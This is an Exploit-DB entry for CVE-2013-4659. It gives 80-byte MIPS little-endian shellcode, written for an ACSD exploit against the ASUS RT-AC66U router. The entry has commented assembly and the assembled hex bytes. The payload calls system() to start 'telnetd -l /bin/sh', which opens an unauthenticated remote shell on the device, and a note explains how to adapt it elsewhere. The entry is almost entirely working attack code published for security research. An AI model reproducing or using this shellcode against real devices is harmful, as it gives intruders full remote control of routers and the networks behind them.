Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)

EDB-ID:

27132

CVE:

2013-4659

EDB Verified:

Author:

Jacob Holcomb

Type:

shellcode

Exploit:   /  

Platform:

Linux_MIPS

Date:

2013-07-27

Vulnerable App: 
# Disassembled MIPS Little Endian Shellcode 
# Shellcode was designed for ACSD exploit on the ASUS RT-AC66U SOHO router.
# CVE: CVE-2013-4659
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com
#
# NOTE:
# In order to use this MIPS ASM elsewhere, you will need to change the address
# of the system() function call to match your environment and reassemble the ASM.
# _ characters in the comments below represent a space.


    lui     t0,0x6e6c //Loading Upper Immediate nl into temp. reg. #0
    ori     t0,t0,0x6574 //Bitwise OR immediate. Putting et into lower 16 bits of t0
    sw      t0,-20(sp) //Store word pointer to command string for execution
    
    lui     t1,0x2064 //Loading Upper Immediate _d into temp. reg. #1
    ori     t1,t1,0x7465 //Bitwise OR immediate. Putting te into lower 16 bits of t0
    sw      t1,-16(sp) //Store next part of command

    lui     t2,0x2f20 //Loading Upper Immediate /_ into temp. reg. #2
    ori     t2,t2,0x6c2d //Bitwise OR immediate. Putting l- into lower 16 bits of t1
    sw      t2,-12(sp) //Store next part of command

    lui     t3,0x2f6e //Loading Upper Immedate /n into temp. reg. #3
    ori     t3,t3,0x6962 //Bitwise OR immediate. Putting ib into lower 16 bits of t2
    sw      t3,-8(sp) //Store next part of command

    li      t4,26739 //Loading Immediate hs00 into temp. reg. #4
    sw      t4,-4(sp) //Store next part of command

    addi    a0,sp,-20 //Store "telnetd -l /bin/sh" in reg. a0 for system() function call
    addi    sp,sp,-20 //Move stack pointer to "telnetd -l /bin/sh" string on the stack 

    lui     t9,0x2ab4 //Loading Upper Immediate of system() into t9
    ori     t9,t9,0xf050 //Bitwise OR immediate. Putting rest of system() into t9
    jalr    t9 //Jumpying to t9/system()

    andi    at,k1,0x4132 //Filler instruction for branch delay


# NOTE: Assembled shellcode
#
#    #80 Bytes system() Shellcode by Jacob Holcomb of ISE
#    #Calling system() and executing telnetd -l /bin/sh
#    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
#    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
#    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
#    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
#    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
#    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
#    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
#    shellcode += "\x41\x61\x33"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services